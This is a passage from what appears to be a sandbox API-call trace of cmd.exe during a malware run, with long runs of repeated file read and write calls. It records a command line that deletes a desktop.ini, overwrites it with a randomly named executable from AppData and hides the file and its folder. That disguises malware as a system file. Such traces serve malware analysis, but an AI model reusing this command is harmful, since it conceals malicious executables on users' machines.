lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x4, lpData=0x12e788*=0x9, lpcbData=0x12e780*=0x4) returned 0x0 [0207.484] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x4, lpData=0x12e788*=0x9, lpcbData=0x12e780*=0x4) returned 0x0 [0207.484] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x0, lpData=0x12e788*=0x9, lpcbData=0x12e780*=0x1000) returned 0x2 [0207.484] RegCloseKey (hKey=0x40) returned 0x0 [0207.484] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a9 [0207.484] srand (_Seed=0x5b8863a9) [0207.484] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"" [0207.484] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"" [0207.484] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.485] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x231c10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0207.485] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0207.485] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.485] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0207.485] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0207.485] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0207.485] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0207.485] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0207.485] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0207.485] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0207.485] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0207.485] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0207.485] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0207.485] GetEnvironmentStringsW () returned 0x232600* [0207.486] FreeEnvironmentStringsW (penv=0x232600) returned 1 [0207.486] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.486] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0207.486] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0207.486] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0207.486] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0207.486] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0207.486] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0207.486] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0207.486] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0207.486] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0207.486] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f548 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.486] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f548, lpFilePart=0x12f544 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f544*="Desktop") returned 0x18 [0207.486] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0207.486] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f2c4 | out: lpFindFileData=0x12f2c4) returned 0x230c90 [0207.486] FindClose (in: hFindFile=0x230c90 | out: hFindFile=0x230c90) returned 1 [0207.487] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f2c4 | out: lpFindFileData=0x12f2c4) returned 0x230c90 [0207.487] FindClose (in: hFindFile=0x230c90 | out: hFindFile=0x230c90) returned 1 [0207.487] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f2c4 | out: lpFindFileData=0x12f2c4) returned 0x230c90 [0207.487] FindClose (in: hFindFile=0x230c90 | out: hFindFile=0x230c90) returned 1 [0207.487] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0207.487] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0207.487] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0207.487] GetEnvironmentStringsW () returned 0x2304b0* [0207.487] FreeEnvironmentStringsW (penv=0x2304b0) returned 1 [0207.487] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.488] GetConsoleOutputCP () returned 0x1b5 [0207.488] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.488] GetUserDefaultLCID () returned 0x409 [0207.488] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0207.488] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f688, cchData=128 | out: lpLCData="0") returned 2 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f688, cchData=128 | out: lpLCData="0") returned 2 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f688, cchData=128 | out: lpLCData="1") returned 2 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0207.489] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0207.490] GetConsoleTitleW (in: lpConsoleTitle=0x220ad0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.490] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0207.490] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0207.491] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0207.491] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0207.492] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0207.492] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0207.492] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0207.492] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0207.492] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0207.492] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0207.492] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0207.494] _wcsicmp (_String1="del", _String2=")") returned 59 [0207.494] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0207.494] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0207.494] _wcsicmp (_String1="IF", _String2="del") returned 5 [0207.494] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0207.494] _wcsicmp (_String1="REM", _String2="del") returned 14 [0207.494] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0207.496] _wcsicmp (_String1="type", _String2=")") returned 75 [0207.496] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0207.496] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0207.496] _wcsicmp (_String1="IF", _String2="type") returned -11 [0207.496] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0207.496] _wcsicmp (_String1="REM", _String2="type") returned -2 [0207.496] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0207.599] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0207.599] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.606] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.607] FindClose (in: hFindFile=0x232560 | out: hFindFile=0x232560) returned 1 [0207.607] FindClose (in: hFindFile=0x232560 | out: hFindFile=0x232560) returned 1 [0207.607] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0207.608] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0207.608] GetConsoleTitleW (in: lpConsoleTitle=0x12f0b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.608] InitializeProcThreadAttributeList (in: lpAttributeList=0x12ef38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f000 | out: lpAttributeList=0x12ef38, lpSize=0x12f000) returned 1 [0207.608] UpdateProcThreadAttribute (in: lpAttributeList=0x12ef38, dwFlags=0x0, Attribute=0x60001, lpValue=0x12eff8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12ef38, lpPreviousValue=0x0) returned 1 [0207.608] GetStartupInfoW (in: lpStartupInfo=0x12eef4 | out: lpStartupInfo=0x12eef4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0207.608] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0207.609] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12ef94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12efe0 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" ", lpProcessInformation=0x12efe0*(hProcess=0x50, hThread=0x4c, dwProcessId=0x95c, dwThreadId=0xe00)) returned 1 [0207.613] CloseHandle (hObject=0x4c) returned 1 [0207.613] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0207.613] GetEnvironmentStringsW () returned 0x2309e0* [0207.613] FreeEnvironmentStringsW (penv=0x2309e0) returned 1 [0207.613] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0207.700] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12eed4 | out: lpExitCode=0x12eed4*=0x0) returned 1 [0207.700] CloseHandle (hObject=0x50) returned 1 [0207.700] _vsnwprintf (in: _Buffer=0x12f01c, _BufferCount=0x13, _Format="%08X", _ArgList=0x12eee0 | out: _Buffer="00000000") returned 8 [0207.700] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0207.700] GetEnvironmentStringsW () returned 0x2325b0* [0207.700] FreeEnvironmentStringsW (penv=0x2325b0) returned 1 [0207.700] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0207.700] GetEnvironmentStringsW () returned 0x2325b0* [0207.700] FreeEnvironmentStringsW (penv=0x2325b0) returned 1 [0207.700] DeleteProcThreadAttributeList (in: lpAttributeList=0x12ef38 | out: lpAttributeList=0x12ef38) [0207.700] GetConsoleTitleW (in: lpConsoleTitle=0x12f2b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.701] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\desktop.ini")) returned 0xffffffff [0207.701] GetLastError () returned 0x2 [0207.701] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1")) returned 0x10 [0207.701] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0207.701] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0207.701] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\desktop.ini")) returned 0xffffffff [0207.701] GetLastError () returned 0x2 [0207.702] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12ed64 | out: lpConsoleScreenBufferInfo=0x12ed64) returned 1 [0207.702] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0207.703] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0207.703] GetConsoleTitleW (in: lpConsoleTitle=0x12f254, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.703] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0207.703] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.704] GetFileType (hFile=0x50) returned 0x1 [0207.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.705] GetFileType (hFile=0x50) returned 0x1 [0207.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.705] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] GetFileType (hFile=0x50) returned 0x1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] GetFileType (hFile=0x50) returned 0x1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] GetFileType (hFile=0x50) returned 0x1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] GetFileType (hFile=0x50) returned 0x1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] GetFileType (hFile=0x50) returned 0x1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] GetFileType (hFile=0x50) returned 0x1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.707] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.707] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.707] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.707] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.707] GetFileType (hFile=0x50) returned 0x1 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.707] GetFileType (hFile=0x50) returned 0x1 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.707] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.707] GetFileType (hFile=0x50) returned 0x1 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.707] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.707] GetFileType (hFile=0x50) returned 0x1 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.707] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.707] GetFileType (hFile=0x50) returned 0x1 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.707] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] GetFileType (hFile=0x50) returned 0x1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] GetFileType (hFile=0x50) returned 0x1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] GetFileType (hFile=0x50) returned 0x1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.708] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.708] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.708] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.708] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] GetFileType (hFile=0x50) returned 0x1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] GetFileType (hFile=0x50) returned 0x1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] GetFileType (hFile=0x50) returned 0x1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] GetFileType (hFile=0x50) returned 0x1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] GetFileType (hFile=0x50) returned 0x1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] GetFileType (hFile=0x50) returned 0x1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] GetFileType (hFile=0x50) returned 0x1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] GetFileType (hFile=0x50) returned 0x1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] WriteFile (in: hFile=0x50, 